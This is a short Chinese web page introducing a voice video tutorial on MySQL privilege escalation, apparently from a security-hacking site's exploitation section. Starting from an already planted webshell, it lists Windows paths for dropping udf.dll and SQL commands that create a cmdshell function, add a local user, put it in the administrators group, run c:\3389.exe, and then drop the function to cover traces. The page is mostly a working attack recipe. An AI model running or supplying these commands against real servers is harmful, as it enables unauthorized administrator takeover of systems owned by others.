| 动画介绍:(注意:这是语音教程,请打开您的音响,并且使用1024*768的屏幕分辨率来观看本教程!)
教程名称:mySQL提权教程 主讲:低调小飞
这里已经有一个webshll后,我们来提权演示。
先找ROOT账户
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
现在基本上win的服务器就这两个导出UDF.DLL
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user user password /add’);
select cmdshell(’net localgroup administrators user /add’);
select cmdshell(’c:\3389.exe’);
drop function cmdshell; 删除函数
select cmdshell(’netstat -an’); | 
安全中国首页 > 动画中心 > 提权利用动画
